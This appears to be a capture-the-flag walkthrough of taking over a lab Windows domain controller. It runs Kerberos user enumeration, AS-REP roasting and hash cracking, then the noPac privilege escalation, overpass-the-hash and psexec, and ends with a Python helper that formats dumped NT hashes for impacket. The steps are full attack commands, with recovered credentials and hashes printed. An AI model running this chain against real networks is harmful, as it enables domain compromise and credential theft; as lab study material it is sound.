machine ip: 172.31.3.3
my ip: 10.10.0.33

### Port information

```text
Open 172.31.3.3:53
Open 172.31.3.3:88
Open 172.31.3.3:135
Open 172.31.3.3:139
Open 172.31.3.3:389
Open 172.31.3.3:445
Open 172.31.3.3:464
Open 172.31.3.3:593
Open 172.31.3.3:636
Open 172.31.3.3:3389
Open 172.31.3.3:5985
Open 172.31.3.3:9389
Open 172.31.3.3:47001
Open 172.31.3.3:49664
Open 172.31.3.3:49665
Open 172.31.3.3:49666
Open 172.31.3.3:49668
Open 172.31.3.3:49671
Open 172.31.3.3:49675
Open 172.31.3.3:49674
Open 172.31.3.3:49682
Open 172.31.3.3:49699
Open 172.31.3.3:49704
```

DNS (53), Kerberos (88), kpasswd (464), LDAP/LDAPS (389/636) and ADWS (9389) together mark the host as a domain controller; SMB (445), WinRM (5985) and RDP (3389) are the services to come back to once credentials are in hand.

### Kerberos user enumeration and AS-REP roasting (brute.csl)

Enumerate valid domain users with kerbrute. No password is needed: it only checks whether the KDC knows the principal, so it is quiet compared with password spraying.

```
./kerbrute userenum -d brute.csl /usr/share/SecLists/Usernames/Names/names.txt --dc 172.31.3.3
```

![[Pasted image 20220109051156.png]]

Save the valid names to a file (`user`) and request an AS-REP for each of them. Any account with "Do not require Kerberos preauthentication" set hands back a ticket encrypted with its password hash, which can be cracked offline:

```
impacket-GetNPUsers -no-pass -dc-ip 172.31.3.3 brute.csl/ -usersfile user -format hashcat
```

![[Pasted image 20220109051134.png]]

Crack the `$krb5asrep$23$` hash (saved to `hash`) with hashcat mode 18200:

```
hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt
```

![[Pasted image 20220109051310.png]]

Credentials recovered: tess : Unique1

### Way 1: noPac to administrator

noPac (CVE-2021-42278 / CVE-2021-42287) chains sAMAccountName spoofing with an S4U2self request to obtain a service ticket as the domain administrator from any low-privileged user. It needs a DC without the November 2021 updates and an account that can still create a machine account (ms-DS-MachineAccountQuota, default 10). `-dump` runs secretsdump with the resulting ticket:

```
python3 noPac.py brute.csl/tess:Unique1 -dc-ip 172.31.3.3 --impersonate administrator -use-ldap -use-vss -dump
```

![[Pasted image 20220109051653.png]]

![[Pasted image 20220109051800.png]]

![[Pasted image 20220113115415.png]]

### Pass the ticket test

The dump gives the Administrator entry in secretsdump format (`user:rid:lmhash:nthash:::`):

```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e2068a39ee8150b697797d6c3e513df7::
```

Request a TGT with the NT hash (overpass-the-hash), then use the cached ticket with psexec. impacket's `-hashes` expects `LMHASH:NTHASH` and splits on the colon, so the colon must stay even when only the NT hash is used; getTGT writes the ticket to `administrator.ccache`, which has to be exported through `KRB5CCNAME` before `-k -no-pass` will find it:

```
# domain: brute.csl
python getTGT.py brute.csl/administrator -hashes aad3b435b51404eeaad3b435b51404ee:e2068a39ee8150b697797d6c3e513df7 -dc-ip 172.31.3.3
export KRB5CCNAME=administrator.ccache
python psexec.py brute.csl/[email protected] -k -no-pass
## the target must be the DC's hostname, not its IP: the service ticket is bound to the host's SPN,
## so the DC's FQDN must be added to /etc/hosts first
```

![[Pasted image 20220113115627.png]]

### flags

```
393bca87e3cb9dc049f3e61483f83cc1
fb23c6d8d663aa63870cfb5e535597a8
```
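Back to the pass-the-ticket step. The following is an added example (Python), not code from the original writeup or from impacket: it parses secretsdump-style `user:rid:lmhash:nthash:::` lines such as the Administrator line above, builds the `LMHASH:NTHASH` value that `getTGT.py`/`psexec.py -hashes` expect (a bare NT hash without the colon makes impacket's `split(':')` fail before it ever contacts the KDC), and flags the well-known empty LM and empty NT hashes. The Administrator line is the one from the dump above; the krbtgt and DC$ lines and their hashes are constructed for the example.

```python
#!/usr/bin/env python3
"""Turn secretsdump-style hash lines into the LM:NT argument impacket wants.

Added example, not code from the writeup or from impacket. getTGT.py, psexec.py
and friends take `-hashes LMHASH:NTHASH` and split that string on ':', so a
bare NT hash crashes them. This helper parses a dump, builds the argument and
flags the two well-known "empty" hashes so a tester does not chase an account
that has no usable secret.
"""
import re

# LM hash of the empty string: present on every modern account because LM storage is off.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of the empty password: an account with this set has no password at all.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
HEX32 = re.compile(r"^[0-9a-f]{32}$")

# Constructed sample: the Administrator line is from the writeup above; the
# krbtgt and DC$ lines (and their hashes) are made up for this example.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e2068a39ee8150b697797d6c3e513df7:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
BRUTE\\DC$:1000:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
[*] Cleaning up...
"""


def parse_secretsdump_line(line):
    """Return (user, rid, lmhash, nthash) for one `user:rid:lm:nt:::` line.

    Accepts an optional `DOMAIN\\` prefix on the user. Raises ValueError for
    status lines or anything whose hash fields are not 32 hex characters.
    """
    parts = line.strip().split(":")
    if len(parts) < 4:
        raise ValueError(f"not a hash line: {line!r}")
    user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
    if "\\" in user:
        user = user.split("\\", 1)[1]
    if not rid.isdigit():
        raise ValueError(f"bad RID in {line!r}")
    if not (HEX32.match(lm) and HEX32.match(nt)):
        raise ValueError(f"bad hash field in {line!r}")
    return user, int(rid), lm, nt


def impacket_hashes_arg(lmhash, nthash):
    """Value for impacket's -hashes flag: LMHASH:NTHASH.

    The LM part may be left empty, but the colon must remain.
    """
    if not HEX32.match(nthash):
        raise ValueError("NT hash must be 32 hex characters")
    return f"{lmhash}:{nthash}"


def triage_dump(text):
    """Parse a whole secretsdump output and describe each account.

    Status lines ('[*] ...') are skipped. Each entry carries the ready-to-use
    -hashes value plus the flags a tester checks before an overpass-the-hash
    attempt: empty LM/NT hash, built-in Administrator (RID 500), machine account.
    """
    entries = []
    for line in text.splitlines():
        try:
            user, rid, lm, nt = parse_secretsdump_line(line)
        except ValueError:
            continue
        entries.append({
            "user": user,
            "rid": rid,
            "hashes": impacket_hashes_arg(lm, nt),
            "lm_is_empty": lm == EMPTY_LM,
            "nt_is_empty": nt == EMPTY_NT,
            "builtin_admin": rid == 500,
            "machine_account": user.endswith("$"),
        })
    return entries


def gettgt_command(domain, entry, dc_ip):
    """Assemble the getTGT.py invocation for one entry (a string; nothing is executed)."""
    return (f"getTGT.py {domain}/{entry['user']} -hashes {entry['hashes']} "
            f"-dc-ip {dc_ip}")


if __name__ == "__main__":
    entries = triage_dump(SAMPLE_DUMP)
    for e in entries:
        tag = "ADMIN" if e["builtin_admin"] else ("MACHINE" if e["machine_account"] else "user")
        print(f"[{tag:7}] {e['user']:<14} rid={e['rid']:<5} -hashes {e['hashes']}")
    print(gettgt_command("brute.csl", entries[0], "172.31.3.3"))
```

The `lm_is_empty` flag is expected on every entry of a current domain; `nt_is_empty` on a human account means the password is blank and no cracking or pass-the-hash is needed, while a `$` suffix marks a machine account whose NT hash is a Kerberos key rather than a logon password.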